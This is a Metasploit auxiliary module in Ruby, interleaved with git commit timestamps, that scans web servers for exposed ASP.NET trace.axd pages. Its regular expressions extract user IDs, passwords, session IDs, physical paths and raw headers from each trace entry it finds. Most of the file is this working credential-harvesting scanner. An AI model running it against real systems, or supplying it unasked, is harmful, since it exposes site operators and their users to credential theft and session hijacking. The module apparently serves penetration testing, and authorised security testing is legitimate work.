2010-04-30 08:40:19 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2010-04-26 18:29:24 +00:00
|
|
|
##
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Exploit mixins should be called first
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::WmapScanDir
|
|
|
|
# Scanner mixin should be near last
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'HTTP trace.axd Content Scanner',
|
|
|
|
'Description' => 'Detect trace.axd files and analize its content',
|
|
|
|
'Author' => ['c4an'],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
|
|
|
|
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
register_advanced_options(
|
|
|
|
[
|
|
|
|
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(target_host)
|
|
|
|
tpath = normalize_uri(datastore['PATH'])
|
|
|
|
if tpath[-1,1] != '/'
|
|
|
|
tpath += '/'
|
|
|
|
end
|
|
|
|
|
|
|
|
begin
|
|
|
|
turl = tpath+'trace.axd'
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => turl,
|
|
|
|
'method' => 'GET',
|
|
|
|
'version' => '1.0',
|
|
|
|
}, 10)
|
|
|
|
|
|
|
|
|
|
|
|
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
|
2017-07-13 23:09:35 +00:00
|
|
|
print_good("[#{target_host}] #{tpath}trace.axd FOUND.")
|
2013-08-30 21:28:54 +00:00
|
|
|
|
|
|
|
report_note(
|
|
|
|
:host => target_host,
|
|
|
|
:proto => 'tcp',
|
|
|
|
:sname => (ssl ? 'https' : 'http'),
|
|
|
|
:port => rport,
|
|
|
|
:type => 'TRACE_AXD',
|
|
|
|
:data => "#{tpath}trace.axd",
|
|
|
|
:update => :unique_data
|
|
|
|
)
|
|
|
|
|
|
|
|
if datastore['TRACE_DETAILS']
|
|
|
|
|
|
|
|
aregex = /Trace.axd\?id=\d/
|
|
|
|
result = res.body.scan(aregex).uniq
|
|
|
|
|
|
|
|
result.each do |u|
|
|
|
|
turl = tpath+u.to_s
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => turl,
|
|
|
|
'method' => 'GET',
|
|
|
|
'version' => '1.0',
|
|
|
|
}, 10)
|
|
|
|
|
|
|
|
if res
|
|
|
|
reg_info = [
|
|
|
|
/<td>UserId<\/td><td>(\w+.*)<\/td>/,
|
|
|
|
/<td>Password<\/td><td>(\w+.*)<\/td>/,
|
|
|
|
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
|
|
|
|
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
|
|
|
|
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
|
|
|
|
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
|
|
|
|
]
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("DETAIL: #{turl}")
|
2013-08-30 21:28:54 +00:00
|
|
|
reg_info.each do |reg|
|
|
|
|
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
|
|
|
|
str = result.to_s.chomp
|
|
|
|
|
|
|
|
|
|
|
|
if reg.to_s.include?"APPL_PHYSICAL_PATH"
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("Physical Path: #{str}")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif reg.to_s.include?"UserId"
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("User ID: #{str}")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif reg.to_s.include?"Password"
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("Password: #{str}")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif reg.to_s.include?"AspFilterSessionId"
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("Session ID: #{str}")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif reg.to_s.include?"LOCAL_ADDR"
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("Local Address: #{str}")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif result.include?"Via"
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("VIA: #{str}")
|
2013-08-30 21:28:54 +00:00
|
|
|
elsif reg.to_s.include?"ALL_RAW"
|
2017-07-19 11:48:52 +00:00
|
|
|
print_status("Headers: #{str}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
end
|
|
|
|
end
|
2011-02-04 01:54:32 +00:00
|
|
|
end
|